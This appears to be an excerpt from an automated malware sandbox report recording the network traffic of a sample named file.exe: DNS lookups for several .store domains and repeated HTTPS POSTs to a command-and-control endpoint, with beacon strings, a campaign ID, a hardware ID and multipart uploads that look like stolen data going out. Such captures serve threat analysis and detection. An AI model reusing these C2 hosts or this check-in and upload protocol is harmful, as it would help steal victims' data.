Oct 30, 2024 06:15:59.541033030 CET | 192.168.2.5 | 1.1.1.1 | 0x61e3 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.573154926 CET | 192.168.2.5 | 1.1.1.1 | 0x5d3a | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.584908009 CET | 192.168.2.5 | 1.1.1.1 | 0x5a2d | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.596182108 CET | 192.168.2.5 | 1.1.1.1 | 0xf4f7 | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 06:15:59.536302090 CET | 1.1.1.1 | 192.168.2.5 | 0xbd8f | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.550151110 CET | 1.1.1.1 | 192.168.2.5 | 0x61e3 | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.582647085 CET | 1.1.1.1 | 192.168.2.5 | 0x5d3a | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.593558073 CET | 1.1.1.1 | 192.168.2.5 | 0x5a2d | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.612287045 CET | 1.1.1.1 | 192.168.2.5 | 0xf4f7 | No error (0) | necklacedmny.store | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:15:59.612287045 CET | 1.1.1.1 | 192.168.2.5 | 0xf4f7 | No error (0) | necklacedmny.store | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 06:16:16.739851952 CET | 1.1.1.1 | 192.168.2.5 | 0xe603 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 06:16:16.739851952 CET | 1.1.1.1 | 192.168.2.5 | 0xe603 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                                                        • necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | 6136 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 05:16:00 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: necklacedmny.store
2024-10-30 05:16:00 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-30 05:16:01 UTC | 1020 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 05:16:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vmkimelef33hrm3vk9kt3lo06k; expires=Sat, 22 Feb 2025 23:02:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Vm01XXBir6lxBnYFo8pEiuZ4Uo%2FL%2Fjz6te%2FmOFKn1WanvYQYBIB9HXG50s8HVlGsGW3ivSTZc0rhsXgFuES%2BWbFitk6ASC7t2bSIVK6CJJ%2BknrBTBBNzjjHOmPGRN3UEE%2FQyLQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da8ee481c702897-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2365&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1202657&cwnd=251&unsent_bytes=0&cid=8f595d999411c77a&ts=1046&x=0"
2024-10-30 05:16:01 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-30 05:16:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | 6136 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 05:16:01 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: necklacedmny.store
2024-10-30 05:16:01 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-30 05:16:02 UTC | 1011 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 05:16:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1ersttirpq19ssc6j325f9dq5m; expires=Sat, 22 Feb 2025 23:02:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6FY7rTYV18TxJnjFCtyf2x42NrmZ7l0pKO293cYEi5cPa5r2F%2B6NOys8swI55ctT5ig8PaZBxT71vXwr44KEa9tNbymN%2FPJBXcRlrjWhywxvPkm5W6XsRAh1zWfAhDteJbjYG20%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da8ee50afda35a0-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2551541&cwnd=231&unsent_bytes=0&cid=1ff3616a43a9f6f9&ts=487&x=0"
2024-10-30 05:16:02 UTC | 358 | IN | Data Raw: 34 34 36 63 0d 0a 46 48 4d 6f 67 52 67 78 67 45 6d 57 50 4b 61 4c 44 57 54 30 6f 52 55 4e 6d 6c 4c 6d 53 32 71 6e 75 76 56 31 4e 4b 6b 4e 50 7a 68 76 55 56 36 6a 49 67 57 73 61 2b 56 5a 68 4c 46 35 46 6f 48 45 4f 53 2f 37 4e 73 52 78 44 4d 62 57 68 68 41 59 69 33 74 53 47 69 34 56 53 65 31 72 56 4b 78 72 38 30 53 45 73 56 59 66 31 73 52 37 4c 36 42 77 67 79 45 49 78 74 61 58 46 46 2f 47 66 56 4e 62 66 42 39 50 36 58 31 53 35 43 6a 36 55 63 50 75 61 41 57 65 7a 33 78 67 38 6a 2f 45 5a 30 6a 43 77 4e 64 50 46 75 52 6f 53 31 6c 5a 45 6c 76 71 4f 6b 79 73 4d 72 52 5a 79 4b 6b 33 52 70 58 45 64 32 48 38 4e 6f 30 6a 41 73 2f 65 6c 68 46 65 32 57 52 5a 55 48 77 52 54 4f 68 33 57 2f 41 6c 38 46 62 49 36 47 49 46 31 6f 30 33 61 4f 42 77 33 47 6c 62 39 39 75 47 42
Data Ascii: 446cFHMogRgxgEmWPKaLDWT0oRUNmlLmS2qnuvV1NKkNPzhvUV6jIgWsa+VZhLF5FoHEOS/7NsRxDMbWhhAYi3tSGi4VSe1rVKxr80SEsVYf1sR7L6BwgyEIxtaXFF/GfVNbfB9P6X1S5Cj6UcPuaAWez3xg8j/EZ0jCwNdPFuRoS1lZElvqOkysMrRZyKk3RpXEd2H8No0jAs/elhFe2WRZUHwRTOh3W/Al8FbI6GIF1o03aOBw3Glb99uGB
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 2f 46 58 50 37 48 30 4e 6e 38 35 36 62 2f 55 36 69 79 6f 49 77 74 4b 64 47 46 7a 50 59 6c 42 63 64 68 45 4b 72 54 70 55 2b 6d 75 73 48 75 66 73 66 77 47 61 31 54 56 56 75 43 2f 4b 4d 45 6a 43 31 4e 64 50 46 73 4e 71 58 6c 6c 39 48 6b 6e 72 63 55 48 69 4f 66 4a 54 77 66 74 70 41 35 6a 4a 64 48 33 79 50 6f 49 71 41 63 37 52 6b 68 42 53 69 79 45 64 58 57 35 52 45 71 4e 62 58 75 6b 6e 2f 6b 6e 45 71 58 42 49 6a 34 4e 77 59 37 68 6f 78 43 30 4a 77 64 6d 54 47 56 6a 50 59 31 74 55 65 78 35 4d 36 58 70 55 36 43 50 38 58 38 6e 69 59 41 61 54 7a 6e 4e 70 39 44 47 42 61 55 61 46 33 34 39 58 44 6f 74 42 57 6c 6c 6b 55 33 2f 67 64 46 33 6c 50 62 52 42 69 76 41 76 41 5a 71 44 4c 79 2f 32 4e 59 73 37 43 64 66 64 6d 51 56 61 7a 6d 6c 51 57 58 67 52 54 2b 52 33 58 65 51
Data Ascii: /FXP7H0Nn856b/U6iyoIwtKdGFzPYlBcdhEKrTpU+musHufsfwGa1TVVuC/KMEjC1NdPFsNqXll9HknrcUHiOfJTwftpA5jJdH3yPoIqAc7RkhBSiyEdXW5REqNbXukn/knEqXBIj4NwY7hoxC0JwdmTGVjPY1tUex5M6XpU6CP8X8niYAaTznNp9DGBaUaF349XDotBWllkU3/gdF3lPbRBivAvAZqDLy/2NYs7CdfdmQVazmlQWXgRT+R3XeQ
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 76 41 76 41 5a 71 44 4c 79 2f 30 4f 59 51 69 41 73 48 59 6b 42 70 54 79 47 68 65 56 33 45 62 52 4f 52 2b 58 2b 73 6d 38 6c 37 44 37 57 6f 55 6b 38 70 37 59 37 68 2b 78 43 34 51 68 59 44 58 4f 46 48 64 62 48 4a 5a 5a 78 67 4b 2f 44 52 4b 6f 69 7a 34 48 70 79 70 61 41 4f 65 79 48 46 6e 2b 43 4b 42 4a 77 50 45 30 70 45 57 57 38 64 70 58 56 74 32 46 30 62 6a 66 56 54 77 4f 66 46 59 31 75 4d 76 53 4e 62 45 62 79 2b 67 63 4c 49 35 48 39 54 4f 31 53 4a 56 78 57 46 61 54 44 59 4f 42 50 6f 36 56 4f 35 72 72 42 37 50 36 57 4d 42 6e 73 56 7a 5a 2f 63 2f 6a 54 73 4a 79 64 61 46 45 46 62 43 59 56 4a 57 66 78 78 4e 37 6e 46 5a 37 79 2f 7a 58 34 53 6e 4c 77 47 4f 67 79 38 76 7a 69 43 4a 4a 53 62 4f 31 4a 35 58 53 59 56 32 48 56 31 36 55 52 4b 6a 66 6c 2f 71 49 66 74 58
Data Ascii: vAvAZqDLy/0OYQiAsHYkBpTyGheV3EbROR+X+sm8l7D7WoUk8p7Y7h+xC4QhYDXOFHdbHJZZxgK/DRKoiz4HpypaAOeyHFn+CKBJwPE0pEWW8dpXVt2F0bjfVTwOfFY1uMvSNbEby+gcLI5H9TO1SJVxWFaTDYOBPo6VO5rrB7P6WMBnsVzZ/c/jTsJydaFEFbCYVJWfxxN7nFZ7y/zX4SnLwGOgy8vziCJJSbO1J5XSYV2HV16URKjfl/qIftX
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 47 53 78 58 67 76 74 6e 43 44 4d 55 69 64 6d 4c 67 77 59 34 6c 4f 5a 78 70 70 58 31 4f 6a 66 56 2b 69 63 37 52 53 78 2b 56 6e 43 5a 44 4b 65 32 58 78 4f 34 67 69 44 4d 6e 52 6b 68 46 58 7a 6d 70 63 58 6e 6f 62 54 4f 42 35 58 4f 30 6b 2f 42 36 4b 71 57 67 65 31 70 73 33 53 75 38 37 69 69 39 49 32 70 61 4f 56 31 48 48 4c 77 55 61 65 68 68 4d 35 58 39 66 34 79 33 38 57 38 7a 74 62 67 43 51 77 48 68 72 2f 54 47 4c 4c 51 54 4c 30 70 59 57 57 73 42 67 56 6c 38 32 58 77 72 6b 59 68 4f 36 61 38 56 64 30 76 35 2f 43 74 62 63 4f 58 61 34 4e 34 68 70 55 49 58 5a 68 52 31 63 78 57 70 53 58 33 55 65 54 65 35 38 58 2b 67 69 2f 46 6a 4c 34 48 30 46 6d 73 31 77 59 66 51 2b 69 53 4d 4c 79 4a 6a 5a 56 31 48 54 4c 77 55 61 57 68 5a 48 7a 58 46 66 35 57 76 72 45 4e 32 70 61
Data Ascii: GSxXgvtnCDMUidmLgwY4lOZxppX1OjfV+ic7RSx+VnCZDKe2XxO4giDMnRkhFXzmpcXnobTOB5XO0k/B6KqWge1ps3Su87ii9I2paOV1HHLwUaehhM5X9f4y38W8ztbgCQwHhr/TGLLQTL0pYWWsBgVl82XwrkYhO6a8Vd0v5/CtbcOXa4N4hpUIXZhR1cxWpSX3UeTe58X+gi/FjL4H0Fms1wYfQ+iSMLyJjZV1HTLwUaWhZHzXFf5WvrEN2pa
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 33 4e 37 67 47 67 7a 6b 59 78 70 71 6d 41 56 58 64 5a 46 42 57 4e 67 34 45 2b 6a 70 55 37 6d 75 73 48 73 4c 6d 5a 67 57 5a 77 6e 35 6a 39 54 57 4e 4c 41 6e 44 33 4a 30 64 56 73 31 70 58 46 39 38 45 6b 76 70 63 31 54 71 4c 50 64 4d 68 4b 63 76 41 59 36 44 4c 79 2f 52 4e 35 59 6e 47 49 58 48 32 51 34 57 7a 47 4d 64 41 6a 59 56 51 4f 78 2b 56 4f 34 74 38 56 6a 4a 36 47 41 48 6c 73 78 7a 5a 50 45 32 68 53 51 4e 79 4e 79 46 48 56 33 45 59 31 52 57 65 31 45 45 6f 33 31 4c 6f 6e 4f 30 62 38 6e 6e 59 51 47 41 67 32 67 68 34 58 43 44 4a 55 69 64 6d 4a 59 62 57 63 68 67 58 6c 6c 33 47 31 6a 78 64 6c 72 71 4c 76 68 56 79 75 39 39 41 4a 6e 4b 64 47 7a 78 4e 34 77 6c 41 73 62 66 31 31 6b 57 7a 48 63 64 41 6a 59 79 58 66 4e 33 45 2f 31 6c 37 52 37 44 35 53 39 65 31 73
Data Ascii: 3N7gGgzkYxpqmAVXdZFBWNg4E+jpU7musHsLmZgWZwn5j9TWNLAnD3J0dVs1pXF98Ekvpc1TqLPdMhKcvAY6DLy/RN5YnGIXH2Q4WzGMdAjYVQOx+VO4t8VjJ6GAHlsxzZPE2hSQNyNyFHV3EY1RWe1EEo31LonO0b8nnYQGAg2gh4XCDJUidmJYbWchgXll3G1jxdlrqLvhVyu99AJnKdGzxN4wlAsbf11kWzHcdAjYyXfN3E/1l7R7D5S9e1s
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 50 34 73 67 41 63 48 51 6c 42 64 53 7a 32 68 59 57 58 6f 61 54 65 42 31 56 2b 73 6c 2f 56 47 45 70 79 38 42 6a 6f 4d 76 4c 39 6b 72 68 79 55 46 68 63 66 5a 44 68 62 4d 59 78 30 43 4e 68 31 45 35 6e 70 5a 35 43 2f 78 57 4d 37 73 62 77 32 56 7a 48 4e 70 2f 44 2b 45 49 67 48 45 33 70 49 64 58 63 31 69 58 6c 78 77 55 51 53 6a 66 55 75 69 63 37 52 2b 33 2b 52 6a 41 64 62 63 4f 58 61 34 4e 34 68 70 55 49 58 54 6d 78 4e 52 79 32 4a 65 55 6e 4d 56 51 4f 5a 36 57 2f 41 6a 39 46 6e 57 2b 32 38 50 6b 38 39 30 62 2f 77 32 6a 53 38 4c 77 5a 6a 5a 56 31 48 54 4c 77 55 61 57 78 31 4e 79 6e 31 49 6f 6a 53 36 52 34 54 75 59 30 62 4f 67 33 5a 6b 38 6a 2b 4a 4b 67 37 47 30 35 49 64 56 38 78 6e 55 45 68 31 48 6b 58 6e 65 6c 7a 6b 4c 66 56 52 77 75 35 6d 42 35 37 45 4e 79 47
Data Ascii: P4sgAcHQlBdSz2hYWXoaTeB1V+sl/VGEpy8BjoMvL9krhyUFhcfZDhbMYx0CNh1E5npZ5C/xWM7sbw2VzHNp/D+EIgHE3pIdXc1iXlxwUQSjfUuic7R+3+RjAdbcOXa4N4hpUIXTmxNRy2JeUnMVQOZ6W/Aj9FnW+28Pk890b/w2jS8LwZjZV1HTLwUaWx1Nyn1IojS6R4TuY0bOg3Zk8j+JKg7G05IdV8xnUEh1HkXnelzkLfVRwu5mB57ENyG
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 77 4c 43 79 4a 41 41 57 59 73 68 48 56 55 32 53 58 4f 6a 63 31 54 35 4f 75 4a 54 31 4f 34 76 4f 64 69 44 62 79 2b 67 63 4c 45 71 42 73 76 66 67 51 59 62 37 48 6c 58 58 57 59 57 58 65 77 36 48 61 49 74 74 41 61 58 70 79 38 43 68 34 4d 76 50 36 70 72 30 58 70 66 6c 59 71 49 57 55 2b 4c 65 52 30 43 4a 46 38 4b 38 54 6f 4c 6f 6d 7a 33 54 4e 62 76 62 42 43 56 68 45 6c 52 33 79 71 4a 4c 78 2f 55 35 71 6b 51 54 4d 5a 70 53 6b 73 36 42 45 6e 74 64 46 54 30 61 37 6f 65 79 36 6b 33 50 39 61 4c 4e 31 43 32 63 4a 78 70 55 49 58 74 6c 42 6c 59 7a 48 6c 4d 46 31 45 4c 52 2b 56 74 51 71 4a 6c 74 46 69 45 73 54 39 49 31 73 64 6d 4c 36 42 67 31 6e 4a 64 6c 6f 2f 48 52 55 6d 46 64 68 31 4d 4e 6b 6b 59 72 54 70 42 6f 6e 4f 30 47 63 66 37 66 51 43 56 31 58 51 6f 78 67 36 71
Data Ascii: wLCyJAAWYshHVU2SXOjc1T5OuJT1O4vOdiDby+gcLEqBsvfgQYb7HlXXWYWXew6HaIttAaXpy8Ch4MvP6pr0XpflYqIWU+LeR0CJF8K8ToLomz3TNbvbBCVhElR3yqJLx/U5qkQTMZpSks6BEntdFT0a7oey6k3P9aLN1C2cJxpUIXtlBlYzHlMF1ELR+VtQqJltFiEsT9I1sdmL6Bg1nJdlo/HRUmFdh1MNkkYrTpBonO0Gcf7fQCV1XQoxg6q
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 75 5a 47 56 48 64 66 68 42 39 65 42 5a 4c 39 57 70 45 37 57 75 36 48 73 4b 70 4e 31 54 59 67 33 4e 2b 75 47 6a 55 65 31 4f 51 69 38 42 48 42 4e 51 68 52 42 70 67 55 52 4b 78 4e 42 50 77 61 36 77 65 67 2b 70 39 46 4a 44 41 59 57 79 2f 44 72 6f 4f 42 73 4c 5a 67 51 64 42 78 43 42 7a 62 46 63 76 64 50 5a 35 58 65 77 73 34 6b 2b 45 70 79 38 4a 31 70 74 4f 4c 37 42 77 75 32 64 49 33 5a 6a 50 56 32 50 49 59 56 4e 64 59 41 41 48 78 48 52 55 34 7a 33 6b 53 63 75 6d 51 54 43 33 67 7a 6b 76 2f 6e 44 63 65 30 61 46 33 49 5a 58 44 70 73 39 42 67 38 6c 52 68 71 78 5a 52 33 37 61 2b 49 65 6e 4c 73 68 52 6f 53 44 4c 79 2b 2f 4d 35 59 37 44 73 62 4f 6c 46 42 6f 39 55 68 54 58 58 63 48 57 75 35 32 63 75 45 36 2f 6d 44 36 2f 47 77 49 6d 4d 52 68 66 72 68 2b 78 43 5a 49 6e
Data Ascii: uZGVHdfhB9eBZL9WpE7Wu6HsKpN1TYg3N+uGjUe1OQi8BHBNQhRBpgURKxNBPwa6weg+p9FJDAYWy/DroOBsLZgQdBxCBzbFcvdPZ5Xews4k+Epy8J1ptOL7Bwu2dI3ZjPV2PIYVNdYAAHxHRU4z3kScumQTC3gzkv/nDce0aF3IZXDps9Bg8lRhqxZR37a+IenLshRoSDLy+/M5Y7DsbOlFBo9UhTXXcHWu52cuE6/mD6/GwImMRhfrh+xCZIn
2024-10-30 05:16:02 UTC | 1369 | IN | Data Raw: 56 32 32 68 6a 5a 46 73 44 54 66 4e 35 45 63 34 73 2b 56 4c 36 31 31 67 58 6b 64 4d 31 53 66 73 6d 68 32 6c 47 68 63 44 58 54 78 62 6d 66 56 70 4b 64 56 4e 6d 35 48 64 66 6f 6a 53 36 52 34 54 2f 4c 31 37 46 6a 54 64 39 75 47 6a 45 62 67 76 58 79 70 45 55 51 4d 67 6f 59 32 52 62 41 30 33 7a 65 52 48 54 4a 76 42 49 30 65 70 2f 41 61 6a 39 57 6e 33 2f 49 49 64 72 4c 66 2b 61 70 67 46 56 79 32 46 61 47 6a 68 52 55 71 4d 69 45 38 38 35 38 30 37 48 71 30 6f 38 31 50 4a 68 62 50 67 2b 67 32 6b 58 69 38 48 58 41 52 61 54 50 42 4d 61 5a 46 45 53 6f 7a 31 64 37 79 72 33 55 4d 66 37 66 51 43 56 31 58 51 6f 78 67 36 72 49 67 6e 56 31 59 59 61 55 74 31 52 59 33 31 77 46 45 33 64 52 47 54 7a 4c 4f 51 63 34 75 70 35 42 64 61 4e 4e 33 65 34 61 4d 51 4f 44 73 44 66 31 31
Data Ascii: V22hjZFsDTfN5Ec4s+VL611gXkdM1Sfsmh2lGhcDXTxbmfVpKdVNm5HdfojS6R4T/L17FjTd9uGjEbgvXypEUQMgoY2RbA03zeRHTJvBI0ep/Aaj9Wn3/IIdrLf+apgFVy2FaGjhRUqMiE885807Hq0o81PJhbPg+g2kXi8HXARaTPBMaZFESoz1d7yr3UMf7fQCV1XQoxg6rIgnV1YYaUt1RY31wFE3dRGTzLOQc4up5BdaNN3e4aMQODsDf11


                                                                        Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49706 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6136 | Process: C:\Users\user\Desktop\file.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-30 05:16:03 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 12840
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:03 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:03 UTC | 1021 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=7q9so91ph1ssld90ev68p15o4j; expires=Sat, 22 Feb 2025 23:02:42 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFewHGF%2F2t%2BXmC0tHbP4gJdYj6HGmD8rrp7fl5kpOJFPpRQDXT1poHLyVlP07znneFPu%2FAONYRzYEBVrOqgSqpxJkFsssausZdyhfa0q5lEUo8gG%2FOi4M%2B508XBrWyU58z2tT8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee5a2c7ee79e-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1369&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13782&delivery_rate=2184012&cwnd=252&unsent_bytes=0&cid=d2e5b498eaa9046e&ts=705&x=0"
                                                                        2024-10-30 05:16:03 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11\r\nok 173.254.250.78\r\n   (chunk-size line 0x11 = 17 bytes, followed by the 17-byte payload "ok 173.254.250.78")
                                                                        2024-10-30 05:16:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0\r\n\r\n   (zero-length chunk: end of the chunked body)


                                                                        Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49707 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6136 | Process: C:\Users\user\Desktop\file.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-30 05:16:04 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 15082
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:04 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:05 UTC | 1020 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=rlgck53vpcro6nia7hta1knvp3; expires=Sat, 22 Feb 2025 23:02:44 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTP%2FHfbm7jG0ugfbOCBvYzl33etFvnlCvvvGy1h3Hy7l1V9%2Blj%2BdLE5vJdqYBl%2BrgktnCTFua5Kclq7t15svrZZSs5P87MZ02FhH0Z3whdDNXv0BO7jgQ8CgkilPF%2F7h2pwZW34%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee628f13e766-DFW
